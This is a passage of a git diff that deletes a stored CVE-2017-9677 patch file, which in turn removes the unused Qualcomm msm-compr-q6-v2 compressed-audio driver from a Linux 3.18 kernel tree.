--			pr_err("%s: GET_CAPS failed rc %d\n",
--			__func__, err);
--		if (!err && copy_to_user(arg, &cap, sizeof(cap))) {
--			pr_err("%s: copytouser failed GET_CAPS\n",
--			__func__);
--			err = -EFAULT;
--		}
--		break;
--	}
--	case SNDRV_COMPRESS_SET_PARAMS: {
--		struct snd_compr_params params;
--		if (!arg) {
--			pr_err("%s: Invalid params setparam\n", __func__);
--			return -EINVAL;
--		}
--		if (copy_from_user(&params, arg,
--			sizeof(struct snd_compr_params))) {
--			pr_err("%s: SET_PARAMS\n", __func__);
--			return -EFAULT;
--		}
--		err = msm_compr_ioctl_shared(substream, cmd, &params);
--		if (err)
--			pr_err("%s: SET_PARAMS failed rc %d\n",
--			__func__, err);
--		break;
--	}
--	default:
--		err = msm_compr_ioctl_shared(substream, cmd, arg);
--	}
--	return err;
--}
--
--static int msm_compr_restart(struct snd_pcm_substream *substream)
--{
--	struct snd_pcm_runtime *runtime = substream->runtime;
--	struct compr_audio *compr = runtime->private_data;
--	struct msm_audio *prtd = &compr->prtd;
--	struct audio_aio_write_param param;
--	struct audio_buffer *buf = NULL;
--	struct output_meta_data_st output_meta_data;
--	int time_stamp_flag = 0;
--	int buffer_length = 0;
--
--	pr_debug("%s, trigger restart\n", __func__);
--
--	if (runtime->render_flag & SNDRV_RENDER_STOPPED) {
--		buf = prtd->audio_client->port[IN].buf;
--		pr_debug("%s:writing %d bytes of buffer[%d] to dsp 2\n",
--				__func__, prtd->pcm_count, prtd->out_head);
--		pr_debug("%s:writing buffer[%d] from 0x%08x\n",
--				__func__, prtd->out_head,
--				((unsigned int)buf[0].phys
--				+ (prtd->out_head * prtd->pcm_count)));
--
--		if (runtime->tstamp_mode == SNDRV_PCM_TSTAMP_ENABLE)
--			time_stamp_flag = SET_TIMESTAMP;
--		else
--			time_stamp_flag = NO_TIMESTAMP;
--		memcpy(&output_meta_data, (char *)(buf->data +
--			prtd->out_head * prtd->pcm_count),
--			COMPRE_OUTPUT_METADATA_SIZE);
--
--		buffer_length = output_meta_data.frame_size;
--		pr_debug("meta_data_length: %d, frame_length: %d\n",
--			 output_meta_data.meta_data_length,
--			 output_meta_data.frame_size);
--		pr_debug("timestamp_msw: %d, timestamp_lsw: %d\n",
--			 output_meta_data.timestamp_msw,
--			 output_meta_data.timestamp_lsw);
--
--		param.paddr = (unsigned long)buf[0].phys
--				+ (prtd->out_head * prtd->pcm_count)
--				+ output_meta_data.meta_data_length;
--		param.len = buffer_length;
--		param.msw_ts = output_meta_data.timestamp_msw;
--		param.lsw_ts = output_meta_data.timestamp_lsw;
--		param.flags = time_stamp_flag;
--		param.uid = prtd->session_id;
--		if (q6asm_async_write(prtd->audio_client,
--					&param) < 0)
--			pr_err("%s:q6asm_async_write failed\n",
--				__func__);
--		else
--			prtd->out_head =
--				(prtd->out_head + 1) & (runtime->periods - 1);
--
--		runtime->render_flag &= ~SNDRV_RENDER_STOPPED;
--		return 0;
--	}
--	return 0;
--}
--
--static int msm_compr_volume_ctl_put(struct snd_kcontrol *kcontrol,
--				    struct snd_ctl_elem_value *ucontrol)
--{
--	int rc = 0;
--	struct snd_pcm_volume *vol = snd_kcontrol_chip(kcontrol);
--	struct snd_pcm_substream *substream =
--			 vol->pcm->streams[SNDRV_PCM_STREAM_PLAYBACK].substream;
--	struct msm_audio *prtd;
--	int volume = ucontrol->value.integer.value[0];
--
--	pr_debug("%s: volume : %x\n", __func__, volume);
--	if (!substream)
--		return -ENODEV;
--	if (!substream->runtime)
--		return 0;
--	prtd = substream->runtime->private_data;
--	if (prtd)
--		rc = compressed_set_volume(prtd, volume);
--
--	return rc;
--}
--
--static int msm_compr_volume_ctl_get(struct snd_kcontrol *kcontrol,
--				  struct snd_ctl_elem_value *ucontrol)
--{
--	struct snd_pcm_volume *vol = snd_kcontrol_chip(kcontrol);
--	struct snd_pcm_substream *substream =
--			 vol->pcm->streams[SNDRV_PCM_STREAM_PLAYBACK].substream;
--	struct msm_audio *prtd;
--
--	pr_debug("%s\n", __func__);
--	if (!substream)
--		return -ENODEV;
--	if (!substream->runtime)
--		return 0;
--	prtd = substream->runtime->private_data;
--	if (prtd)
--		ucontrol->value.integer.value[0] = prtd->volume;
--	return 0;
--}
--
--static int msm_compr_add_controls(struct snd_soc_pcm_runtime *rtd)
--{
--	int ret = 0;
--	struct snd_pcm *pcm = rtd->pcm;
--	struct snd_pcm_volume *volume_info;
--	struct snd_kcontrol *kctl;
--
--	dev_dbg(rtd->dev, "%s, Volume cntrl add\n", __func__);
--	ret = snd_pcm_add_volume_ctls(pcm, SNDRV_PCM_STREAM_PLAYBACK,
--				      NULL, 1, rtd->dai_link->be_id,
--				      &volume_info);
--	if (ret < 0)
--		return ret;
--	kctl = volume_info->kctl;
--	kctl->put = msm_compr_volume_ctl_put;
--	kctl->get = msm_compr_volume_ctl_get;
--	kctl->tlv.p = compr_rx_vol_gain;
--	return 0;
--}
--
--static struct snd_pcm_ops msm_compr_ops = {
--	.open	   = msm_compr_open,
--	.hw_params	= msm_compr_hw_params,
--	.close	  = msm_compr_close,
--	.ioctl	  = msm_compr_ioctl,
--	.prepare	= msm_compr_prepare,
--	.trigger	= msm_compr_trigger,
--	.pointer	= msm_compr_pointer,
--	.mmap		= msm_compr_mmap,
--	.restart	= msm_compr_restart,
--#ifdef CONFIG_COMPAT
--	.compat_ioctl   = msm_compr_compat_ioctl,
--#endif
--};
--
--static int msm_asoc_pcm_new(struct snd_soc_pcm_runtime *rtd)
--{
--	struct snd_card *card = rtd->card->snd_card;
--	int ret = 0;
--
--	if (!card->dev->coherent_dma_mask)
--		card->dev->coherent_dma_mask = DMA_BIT_MASK(32);
--
--	ret = msm_compr_add_controls(rtd);
--	if (ret)
--		pr_err("%s, kctl add failed\n", __func__);
--	return ret;
--}
--
--static struct snd_soc_platform_driver msm_soc_platform = {
--	.ops		= &msm_compr_ops,
--	.pcm_new	= msm_asoc_pcm_new,
--};
--
--static int msm_compr_probe(struct platform_device *pdev)
--{
--
--	dev_info(&pdev->dev, "%s: dev name %s\n",
--			 __func__, dev_name(&pdev->dev));
--
--	atomic_set(&compressed_audio.audio_ocmem_req, 0);
--	return snd_soc_register_platform(&pdev->dev,
--				   &msm_soc_platform);
--}
--
--static int msm_compr_remove(struct platform_device *pdev)
--{
--	snd_soc_unregister_platform(&pdev->dev);
--	return 0;
--}
--
--static const struct of_device_id msm_compr_dt_match[] = {
--	{.compatible = "qcom,msm-compr-dsp"},
--	{}
--};
--MODULE_DEVICE_TABLE(of, msm_compr_dt_match);
--
--static struct platform_driver msm_compr_driver = {
--	.driver = {
--		.name = "msm-compr-dsp",
--		.owner = THIS_MODULE,
--		.of_match_table = msm_compr_dt_match,
--	},
--	.probe = msm_compr_probe,
--	.remove = msm_compr_remove,
--};
--
--static int __init msm_soc_platform_init(void)
--{
--	init_waitqueue_head(&the_locks.enable_wait);
--	init_waitqueue_head(&the_locks.eos_wait);
--	init_waitqueue_head(&the_locks.write_wait);
--	init_waitqueue_head(&the_locks.read_wait);
--	init_waitqueue_head(&the_locks.flush_wait);
--
--	return platform_driver_register(&msm_compr_driver);
--}
--module_init(msm_soc_platform_init);
--
--static void __exit msm_soc_platform_exit(void)
--{
--	platform_driver_unregister(&msm_compr_driver);
--}
--module_exit(msm_soc_platform_exit);
--
--MODULE_DESCRIPTION("PCM module platform driver");
--MODULE_LICENSE("GPL v2");
-diff --git a/sound/soc/msm/qdsp6v2/msm-compr-q6-v2.h b/sound/soc/msm/qdsp6v2/msm-compr-q6-v2.h
-deleted file mode 100644
-index d6e3ec6..0000000
---- a/sound/soc/msm/qdsp6v2/msm-compr-q6-v2.h
-+++ /dev/null
-@@ -1,36 +0,0 @@
--/*
-- * Copyright (c) 2012, The Linux Foundation. All rights reserved.
-- *
-- * This program is free software; you can redistribute it and/or modify
-- * it under the terms of the GNU General Public License version 2 and
-- * only version 2 as published by the Free Software Foundation.
-- *
-- * This program is distributed in the hope that it will be useful,
-- * but WITHOUT ANY WARRANTY; without even the implied warranty of
-- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-- * GNU General Public License for more details.
-- */
--
--#ifndef _MSM_COMPR_H
--#define _MSM_COMPR_H
--#include <sound/apr_audio-v2.h>
--#include <sound/q6asm-v2.h>
--#include <sound/compress_params.h>
--#include <sound/compress_offload.h>
--#include <sound/compress_driver.h>
--
--#include "msm-pcm-q6-v2.h"
--
--struct compr_info {
--	struct snd_compr_caps compr_cap;
--	struct snd_compr_codec_caps codec_caps;
--	struct snd_compr_params codec_param;
--};
--
--struct compr_audio {
--	struct msm_audio prtd;
--	struct compr_info info;
--	uint32_t codec;
--};
--
--#endif /*_MSM_COMPR_H*/
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-9677/3.18/0002.patch b/Patches/Linux_CVEs/CVE-2017-9677/3.18/0002.patch
deleted file mode 100644
index 33e0cd6b..00000000
--- a/Patches/Linux_CVEs/CVE-2017-9677/3.18/0002.patch
+++ /dev/null
@@ -1,1774 +0,0 @@
-From dc333eb1c31b5bdd2b6375d7cb890086d8f27d8b Mon Sep 17 00:00:00 2001
-From: Xiaojun Sang <xsang@codeaurora.org>
-Date: Thu, 27 Apr 2017 14:44:25 +0800
-Subject: ASoC: msm: remove unused msm-compr-q6-v2
-
-msm-compr-q6-v2.c and msm-compr-q6-v2.h are no longer used.
-
-CRs-Fixed: 2022953
-Change-Id: I856d90a212a3e123a2c8b80092aff003f7c608c7
-Signed-off-by: Xiaojun Sang <xsang@codeaurora.org>
----
- sound/soc/msm/qdsp6v2/Makefile          |    2 +-
- sound/soc/msm/qdsp6v2/msm-compr-q6-v2.c | 1694 -------------------------------
- sound/soc/msm/qdsp6v2/msm-compr-q6-v2.h |   36 -
- 3 files changed, 1 insertion(+), 1731 deletions(-)
- delete mode 100644 sound/soc/msm/qdsp6v2/msm-compr-q6-v2.c
- delete mode 100644 sound/soc/msm/qdsp6v2/msm-compr-q6-v2.h
-
-diff --git a/sound/soc/msm/qdsp6v2/Makefile b/sound/soc/msm/qdsp6v2/Makefile
-index 8e1aa30..7abaaad 100644
---- a/sound/soc/msm/qdsp6v2/Makefile
-+++ b/sound/soc/msm/qdsp6v2/Makefile
-@@ -1,5 +1,5 @@
- snd-soc-qdsp6v2-objs += msm-dai-q6-v2.o msm-pcm-q6-v2.o msm-pcm-routing-v2.o \
--			msm-compress-q6-v2.o msm-compr-q6-v2.o \
-+			msm-compress-q6-v2.o \
- 			msm-pcm-lpa-v2.o \
- 			msm-pcm-afe-v2.o msm-pcm-voip-v2.o \
- 			msm-pcm-voice-v2.o msm-dai-q6-hdmi-v2.o \
-diff --git a/sound/soc/msm/qdsp6v2/msm-compr-q6-v2.c b/sound/soc/msm/qdsp6v2/msm-compr-q6-v2.c
-deleted file mode 100644
-index 58a4de5..0000000
---- a/sound/soc/msm/qdsp6v2/msm-compr-q6-v2.c
-+++ /dev/null
-@@ -1,1694 +0,0 @@
--/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved.
-- *
-- * This program is free software; you can redistribute it and/or modify
-- * it under the terms of the GNU General Public License version 2 and
-- * only version 2 as published by the Free Software Foundation.
-- *
-- * This program is distributed in the hope that it will be useful,
-- * but WITHOUT ANY WARRANTY; without even the implied warranty of
-- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-- * GNU General Public License for more details.
-- */
--
--
--#include <linux/init.h>
--#include <linux/err.h>
--#include <linux/module.h>
--#include <linux/moduleparam.h>
--#include <linux/time.h>
--#include <linux/wait.h>
--#include <linux/platform_device.h>
--#include <linux/slab.h>
--#include <sound/core.h>
--#include <sound/soc.h>
--#include <sound/soc-dapm.h>
--#include <sound/pcm.h>
--#include <sound/initval.h>
--#include <sound/control.h>
--#include <sound/q6asm-v2.h>
--#include <sound/pcm_params.h>
--#include <asm/dma.h>
--#include <linux/dma-mapping.h>
--#include <linux/msm_audio_ion.h>
--
--#include <sound/timer.h>
--
--#include "msm-compr-q6-v2.h"
--#include "msm-pcm-routing-v2.h"
--#include <sound/tlv.h>
--
--#define COMPRE_CAPTURE_NUM_PERIODS	16
--/* Allocate the worst case frame size for compressed audio */
--#define COMPRE_CAPTURE_HEADER_SIZE	(sizeof(struct snd_compr_audio_info))
--/* Changing period size to 4032. 4032 will make sure COMPRE_CAPTURE_PERIOD_SIZE
-- * is 4096 with meta data size of 64 and MAX_NUM_FRAMES_PER_BUFFER 1
-- */
--#define COMPRE_CAPTURE_MAX_FRAME_SIZE	(4032)
--#define COMPRE_CAPTURE_PERIOD_SIZE	((COMPRE_CAPTURE_MAX_FRAME_SIZE + \
--					  COMPRE_CAPTURE_HEADER_SIZE) * \
--					  MAX_NUM_FRAMES_PER_BUFFER)
--#define COMPRE_OUTPUT_METADATA_SIZE	(sizeof(struct output_meta_data_st))
--#define COMPRESSED_LR_VOL_MAX_STEPS	0x20002000
--
--#define MAX_AC3_PARAM_SIZE		(18*2*sizeof(int))
--#define AMR_WB_BAND_MODE 8
--#define AMR_WB_DTX_MODE 0
--
--
--const DECLARE_TLV_DB_LINEAR(compr_rx_vol_gain, 0,
--			    COMPRESSED_LR_VOL_MAX_STEPS);
--
--static struct audio_locks the_locks;
--
--static struct snd_pcm_hardware msm_compr_hardware_capture = {
--	.info =		 (SNDRV_PCM_INFO_MMAP |
--				SNDRV_PCM_INFO_BLOCK_TRANSFER |
--				SNDRV_PCM_INFO_MMAP_VALID |
--				SNDRV_PCM_INFO_INTERLEAVED |
--				SNDRV_PCM_INFO_PAUSE | SNDRV_PCM_INFO_RESUME),
--	.formats =	      SNDRV_PCM_FMTBIT_S16_LE,
--	.rates =		SNDRV_PCM_RATE_8000_48000,
--	.rate_min =	     8000,
--	.rate_max =	     48000,
--	.channels_min =	 1,
--	.channels_max =	 8,
--	.buffer_bytes_max =
--		COMPRE_CAPTURE_PERIOD_SIZE * COMPRE_CAPTURE_NUM_PERIODS ,
--	.period_bytes_min =	COMPRE_CAPTURE_PERIOD_SIZE,
--	.period_bytes_max = COMPRE_CAPTURE_PERIOD_SIZE,
--	.periods_min =	  COMPRE_CAPTURE_NUM_PERIODS,
--	.periods_max =	  COMPRE_CAPTURE_NUM_PERIODS,
--	.fifo_size =	    0,
--};
--
--static struct snd_pcm_hardware msm_compr_hardware_playback = {
--	.info =		 (SNDRV_PCM_INFO_MMAP |
--				SNDRV_PCM_INFO_BLOCK_TRANSFER |
--				SNDRV_PCM_INFO_MMAP_VALID |
--				SNDRV_PCM_INFO_INTERLEAVED |
--				SNDRV_PCM_INFO_PAUSE | SNDRV_PCM_INFO_RESUME),
--	.formats =	      SNDRV_PCM_FMTBIT_S16_LE | SNDRV_PCM_FMTBIT_S24_LE,
--	.rates =		SNDRV_PCM_RATE_8000_48000 | SNDRV_PCM_RATE_KNOT,
--	.rate_min =	     8000,
--	.rate_max =	     48000,
--	.channels_min =	 1,
--	.channels_max =	 8,
--	.buffer_bytes_max =     1024 * 1024,
--	.period_bytes_min =	128 * 1024,
--	.period_bytes_max =     256 * 1024,
--	.periods_min =	  4,
--	.periods_max =	  8,
--	.fifo_size =	    0,
--};
--
--/* Conventional and unconventional sample rate supported */
--static unsigned int supported_sample_rates[] = {
--	8000, 11025, 12000, 16000, 22050, 24000, 32000, 44100, 48000
--};
--
--/* Add supported codecs for compress capture path */
--static uint32_t supported_compr_capture_codecs[] = {
--	SND_AUDIOCODEC_AMRWB
--};
--
--static struct snd_pcm_hw_constraint_list constraints_sample_rates = {
--	.count = ARRAY_SIZE(supported_sample_rates),
--	.list = supported_sample_rates,
--	.mask = 0,
--};
--
--static bool msm_compr_capture_codecs(uint32_t req_codec)
--{
--	int i;
--	pr_debug("%s req_codec:%d\n", __func__, req_codec);
--	if (req_codec == 0)
--		return false;
--	for (i = 0; i < ARRAY_SIZE(supported_compr_capture_codecs); i++) {
--		if (req_codec == supported_compr_capture_codecs[i])
--			return true;
--	}
--	return false;
--}
--
--static void compr_event_handler(uint32_t opcode,
--		uint32_t token, uint32_t *payload, void *priv)
--{
--	struct compr_audio *compr = priv;
--	struct msm_audio *prtd = &compr->prtd;
--	struct snd_pcm_substream *substream = prtd->substream;
--	struct snd_pcm_runtime *runtime = substream->runtime;
--	struct audio_aio_write_param param;
--	struct audio_aio_read_param read_param;
--	struct audio_buffer *buf = NULL;
--	phys_addr_t temp;
--	struct output_meta_data_st output_meta_data;
--	uint32_t *ptrmem = (uint32_t *)payload;
--	int i = 0;
--	int time_stamp_flag = 0;
--	int buffer_length = 0;
--	int stop_playback = 0;
--
--	pr_debug("%s opcode =%08x\n", __func__, opcode);
--	switch (opcode) {
--	case ASM_DATA_EVENT_WRITE_DONE_V2: {
--		uint32_t *ptrmem = (uint32_t *)&param;
--		pr_debug("ASM_DATA_EVENT_WRITE_DONE\n");
--		pr_debug("Buffer Consumed = 0x%08x\n", *ptrmem);
--		prtd->pcm_irq_pos += prtd->pcm_count;
--		if (atomic_read(&prtd->start))
--			snd_pcm_period_elapsed(substream);
--		else
--			if (substream->timer_running)
--				snd_timer_interrupt(substream->timer, 1);
--		atomic_inc(&prtd->out_count);
--		wake_up(&the_locks.write_wait);
--		if (!atomic_read(&prtd->start)) {
--			atomic_set(&prtd->pending_buffer, 1);
--			break;
--		} else
--			atomic_set(&prtd->pending_buffer, 0);
--
--		/*
--		 * check for underrun
--		 */
--		snd_pcm_stream_lock_irq(substream);
--		if (runtime->status->hw_ptr >= runtime->control->appl_ptr) {
--			runtime->render_flag |= SNDRV_RENDER_STOPPED;
--			stop_playback = 1;
--		}
--		snd_pcm_stream_unlock_irq(substream);
--
--		if (stop_playback) {
--			pr_err("underrun! render stopped\n");
--			break;
--		}
--
--		buf = prtd->audio_client->port[IN].buf;
--		pr_debug("%s:writing %d bytes of buffer[%d] to dsp 2\n",
--				__func__, prtd->pcm_count, prtd->out_head);
--		temp = buf[0].phys + (prtd->out_head * prtd->pcm_count);
--		pr_debug("%s:writing buffer[%d] from 0x%pK\n",
--			__func__, prtd->out_head, &temp);
--
--		if (runtime->tstamp_mode == SNDRV_PCM_TSTAMP_ENABLE)
--			time_stamp_flag = SET_TIMESTAMP;
--		else
--			time_stamp_flag = NO_TIMESTAMP;
--		memcpy(&output_meta_data, (char *)(buf->data +
--			prtd->out_head * prtd->pcm_count),
--			COMPRE_OUTPUT_METADATA_SIZE);
--
--		buffer_length = output_meta_data.frame_size;
--		pr_debug("meta_data_length: %d, frame_length: %d\n",
--			 output_meta_data.meta_data_length,
--			 output_meta_data.frame_size);
--		pr_debug("timestamp_msw: %d, timestamp_lsw: %d\n",
--			 output_meta_data.timestamp_msw,
--			 output_meta_data.timestamp_lsw);
--		if (buffer_length == 0) {
--			pr_debug("Recieved a zero length buffer-break out");
--			break;
--		}
--		param.paddr = temp + output_meta_data.meta_data_length;
--		param.len = buffer_length;
--		param.msw_ts = output_meta_data.timestamp_msw;
--		param.lsw_ts = output_meta_data.timestamp_lsw;
--		param.flags = time_stamp_flag;
--		param.uid = prtd->session_id;
--		for (i = 0; i < sizeof(struct audio_aio_write_param)/4;
--					i++, ++ptrmem)
--			pr_debug("cmd[%d]=0x%08x\n", i, *ptrmem);
--		if (q6asm_async_write(prtd->audio_client,
--					&param) < 0)
--			pr_err("%s:q6asm_async_write failed\n",
--				__func__);
--		else
--			prtd->out_head =
--				(prtd->out_head + 1) & (runtime->periods - 1);
--		break;
--	}
--	case ASM_DATA_EVENT_RENDERED_EOS:
--		pr_debug("ASM_DATA_CMDRSP_EOS\n");
--		if (atomic_read(&prtd->eos)) {
--			pr_debug("ASM_DATA_CMDRSP_EOS wake up\n");
--			prtd->cmd_ack = 1;
--			wake_up(&the_locks.eos_wait);
--			atomic_set(&prtd->eos, 0);
--		}
--		break;
--	case ASM_DATA_EVENT_READ_DONE_V2: {
--		pr_debug("ASM_DATA_EVENT_READ_DONE\n");
--		pr_debug("buf = %pK, data = 0x%X, *data = %pK,\n"
--			 "prtd->pcm_irq_pos = %d\n",
--				prtd->audio_client->port[OUT].buf,
--			 *(uint32_t *)prtd->audio_client->port[OUT].buf->data,
--				prtd->audio_client->port[OUT].buf->data,
--				prtd->pcm_irq_pos);
--
--		memcpy(prtd->audio_client->port[OUT].buf->data +
--			   prtd->pcm_irq_pos, (ptrmem + READDONE_IDX_SIZE),
--			   COMPRE_CAPTURE_HEADER_SIZE);
--		pr_debug("buf = %pK, updated data = 0x%X, *data = %pK\n",
--				prtd->audio_client->port[OUT].buf,
--			*(uint32_t *)(prtd->audio_client->port[OUT].buf->data +
--				prtd->pcm_irq_pos),
--				prtd->audio_client->port[OUT].buf->data);
--		if (!atomic_read(&prtd->start))
--			break;
--		pr_debug("frame size=%d, buffer = 0x%X\n",
--				ptrmem[READDONE_IDX_SIZE],
--				ptrmem[READDONE_IDX_BUFADD_LSW]);
--		if (ptrmem[READDONE_IDX_SIZE] > COMPRE_CAPTURE_MAX_FRAME_SIZE) {
--			pr_err("Frame length exceeded the max length");
--			break;
--		}
--		buf = prtd->audio_client->port[OUT].buf;
--
--		pr_debug("pcm_irq_pos=%d, buf[0].phys = 0x%pK\n",
--				prtd->pcm_irq_pos, &buf[0].phys);
--		read_param.len = prtd->pcm_count - COMPRE_CAPTURE_HEADER_SIZE;
--		read_param.paddr = buf[0].phys +
--			prtd->pcm_irq_pos + COMPRE_CAPTURE_HEADER_SIZE;
--		prtd->pcm_irq_pos += prtd->pcm_count;
--
--		if (atomic_read(&prtd->start))
--			snd_pcm_period_elapsed(substream);
--
--		q6asm_async_read(prtd->audio_client, &read_param);
--		break;
--	}
--	case APR_BASIC_RSP_RESULT: {
--		switch (payload[0]) {
--		case ASM_SESSION_CMD_RUN_V2: {
--			if (substream->stream
--				!= SNDRV_PCM_STREAM_PLAYBACK) {
--				atomic_set(&prtd->start, 1);
--				break;
--			}
--			if (!atomic_read(&prtd->pending_buffer))
--				break;
--			pr_debug("%s: writing %d bytes of buffer[%d] to dsp\n",
--				__func__, prtd->pcm_count, prtd->out_head);
--			buf = prtd->audio_client->port[IN].buf;
--			pr_debug("%s: writing buffer[%d] from 0x%pK head %d count %d\n",
--				__func__, prtd->out_head, &buf[0].phys,
--				prtd->pcm_count, prtd->out_head);
--			if (runtime->tstamp_mode == SNDRV_PCM_TSTAMP_ENABLE)
--				time_stamp_flag = SET_TIMESTAMP;
--			else
--				time_stamp_flag = NO_TIMESTAMP;
--			memcpy(&output_meta_data, (char *)(buf->data +
--				prtd->out_head * prtd->pcm_count),
--				COMPRE_OUTPUT_METADATA_SIZE);
--			buffer_length = output_meta_data.frame_size;
--			pr_debug("meta_data_length: %d, frame_length: %d\n",
--				 output_meta_data.meta_data_length,
--				 output_meta_data.frame_size);
--			pr_debug("timestamp_msw: %d, timestamp_lsw: %d\n",
--				 output_meta_data.timestamp_msw,
--				 output_meta_data.timestamp_lsw);
--			param.paddr = buf[prtd->out_head].phys
--					+ output_meta_data.meta_data_length;
--			param.len = buffer_length;
--			param.msw_ts = output_meta_data.timestamp_msw;
--			param.lsw_ts = output_meta_data.timestamp_lsw;
--			param.flags = time_stamp_flag;
--			param.uid = prtd->session_id;
--			param.metadata_len = COMPRE_OUTPUT_METADATA_SIZE;
--			if (q6asm_async_write(prtd->audio_client,
--						&param) < 0)
--				pr_err("%s:q6asm_async_write failed\n",
--					__func__);
--			else
--				prtd->out_head =
--					(prtd->out_head + 1)
--					& (runtime->periods - 1);
--			atomic_set(&prtd->pending_buffer, 0);
--		}
--			break;
--		case ASM_STREAM_CMD_FLUSH:
--			pr_debug("ASM_STREAM_CMD_FLUSH\n");
--			prtd->cmd_ack = 1;
--			wake_up(&the_locks.flush_wait);
--			break;
--		default:
--			break;
--		}
--		break;
--	}
--	default:
--		pr_debug("Not Supported Event opcode[0x%x]\n", opcode);
--		break;
--	}
--}
--
--static int msm_compr_send_ddp_cfg(struct audio_client *ac,
--					struct snd_dec_ddp *ddp)
--{
--	int i, rc;
--	pr_debug("%s\n", __func__);
--
--	if (ddp->params_length / 2 > SND_DEC_DDP_MAX_PARAMS) {
--		pr_err("%s: Invalid number of params %u, max allowed %u\n",
--			__func__, ddp->params_length / 2,
--			SND_DEC_DDP_MAX_PARAMS);
--		return -EINVAL;
--	}
--
--	for (i = 0; i < ddp->params_length/2; i++) {
--		rc = q6asm_ds1_set_endp_params(ac, ddp->params_id[i],
--						ddp->params_value[i]);
--		if (rc) {
--			pr_err("sending params_id: %d failed\n",
--				ddp->params_id[i]);
--			return rc;
--		}
--	}
--	return 0;
--}
--
--static int msm_compr_playback_prepare(struct snd_pcm_substream *substream)
--{
--	struct snd_pcm_runtime *runtime = substream->runtime;
--	struct compr_audio *compr = runtime->private_data;
--	struct snd_soc_pcm_runtime *soc_prtd = substream->private_data;
--	struct msm_audio *prtd = &compr->prtd;
--	struct snd_pcm_hw_params *params;
--	struct asm_aac_cfg aac_cfg;
--	uint16_t bits_per_sample = 16;
--	int ret;
--
--	struct asm_softpause_params softpause = {
--		.enable = SOFT_PAUSE_ENABLE,
--		.period = SOFT_PAUSE_PERIOD,
--		.step = SOFT_PAUSE_STEP,
--		.rampingcurve = SOFT_PAUSE_CURVE_LINEAR,
--	};
--	struct asm_softvolume_params softvol = {
--		.period = SOFT_VOLUME_PERIOD,
--		.step = SOFT_VOLUME_STEP,
--		.rampingcurve = SOFT_VOLUME_CURVE_LINEAR,
--	};
--
--	pr_debug("%s\n", __func__);
--
--	params = &soc_prtd->dpcm[substream->stream].hw_params;
--	if (runtime->format == SNDRV_PCM_FORMAT_S24_LE)
--		bits_per_sample = 24;
--
--	ret = q6asm_open_write_v2(prtd->audio_client,
--			compr->codec, bits_per_sample);
--	if (ret < 0) {
--		pr_err("%s: Session out open failed\n",
--				__func__);
--		return -ENOMEM;
--	}
--	msm_pcm_routing_reg_phy_stream(
--			soc_prtd->dai_link->be_id,
--			prtd->audio_client->perf_mode,
--			prtd->session_id,
--			substream->stream);
--	/*
--	 * the number of channels are required to call volume api
--	 * accoridngly. So, get channels from hw params
--	 */
--	if ((params_channels(params) > 0) &&
--			(params_periods(params) <= runtime->hw.channels_max))
--		prtd->channel_mode = params_channels(params);
--
--	ret = q6asm_set_softpause(prtd->audio_client, &softpause);
--	if (ret < 0)
--		pr_err("%s: Send SoftPause Param failed ret=%d\n",
--				__func__, ret);
--	ret = q6asm_set_softvolume(prtd->audio_client, &softvol);
--	if (ret < 0)
--		pr_err("%s: Send SoftVolume Param failed ret=%d\n",
--				__func__, ret);
--
--	ret = q6asm_set_io_mode(prtd->audio_client,
--			(COMPRESSED_IO | ASYNC_IO_MODE));
--	if (ret < 0) {
--		pr_err("%s: Set IO mode failed\n", __func__);
--		return -ENOMEM;
--	}
--
--	prtd->pcm_size = snd_pcm_lib_buffer_bytes(substream);
--	prtd->pcm_count = snd_pcm_lib_period_bytes(substream);
--	prtd->pcm_irq_pos = 0;
--	/* rate and channels are sent to audio driver */
--	prtd->samp_rate = runtime->rate;
--	prtd->channel_mode = runtime->channels;
--	prtd->out_head = 0;
--	atomic_set(&prtd->out_count, runtime->periods);
--
--	if (prtd->enabled)
--		return 0;
--
--	switch (compr->info.codec_param.codec.id) {
--	case SND_AUDIOCODEC_MP3:
--		/* No media format block for mp3 */
--		break;
--	case SND_AUDIOCODEC_AAC:
--		pr_debug("%s: SND_AUDIOCODEC_AAC\n", __func__);
--		memset(&aac_cfg, 0x0, sizeof(struct asm_aac_cfg));
--		aac_cfg.aot = AAC_ENC_MODE_EAAC_P;
--		aac_cfg.format = 0x03;
--		aac_cfg.ch_cfg = runtime->channels;
--		aac_cfg.sample_rate =  runtime->rate;
--		ret = q6asm_media_format_block_aac(prtd->audio_client,
--					&aac_cfg);
--		if (ret < 0)
--			pr_err("%s: CMD Format block failed\n", __func__);
--		break;
--	case SND_AUDIOCODEC_AC3: {
--		struct snd_dec_ddp *ddp =
--				&compr->info.codec_param.codec.options.ddp;
--		pr_debug("%s: SND_AUDIOCODEC_AC3\n", __func__);
--		ret = msm_compr_send_ddp_cfg(prtd->audio_client, ddp);
--		if (ret < 0)
--			pr_err("%s: DDP CMD CFG failed\n", __func__);
--		break;
--	}
--	case SND_AUDIOCODEC_EAC3: {
--		struct snd_dec_ddp *ddp =
--				&compr->info.codec_param.codec.options.ddp;
--		pr_debug("%s: SND_AUDIOCODEC_EAC3\n", __func__);
--		ret = msm_compr_send_ddp_cfg(prtd->audio_client, ddp);
--		if (ret < 0)
--			pr_err("%s: DDP CMD CFG failed\n", __func__);
--		break;
--	}
--	default:
--		return -EINVAL;
--	}
--
--	prtd->enabled = 1;
--	prtd->cmd_ack = 0;
--	prtd->cmd_interrupt = 0;
--
--	return 0;
--}
--
--static int msm_compr_capture_prepare(struct snd_pcm_substream *substream)
--{
--	struct snd_pcm_runtime *runtime = substream->runtime;
--	struct compr_audio *compr = runtime->private_data;
--	struct msm_audio *prtd = &compr->prtd;
--	struct audio_buffer *buf = prtd->audio_client->port[OUT].buf;
--	struct snd_codec *codec = &compr->info.codec_param.codec;
--	struct snd_soc_pcm_runtime *soc_prtd = substream->private_data;
--	struct audio_aio_read_param read_param;
--	uint16_t bits_per_sample = 16;
--	int ret = 0;
--	int i;
--
--	prtd->pcm_size = snd_pcm_lib_buffer_bytes(substream);
--	prtd->pcm_count = snd_pcm_lib_period_bytes(substream);
--	prtd->pcm_irq_pos = 0;
--
--	if (runtime->format == SNDRV_PCM_FORMAT_S24_LE)
--		bits_per_sample = 24;
--
--	if (!msm_compr_capture_codecs(
--				compr->info.codec_param.codec.id)) {
--		/*
--		 * request codec invalid or not supported,
--		 * use default compress format
--		 */
--		compr->info.codec_param.codec.id =
--			SND_AUDIOCODEC_AMRWB;
--	}
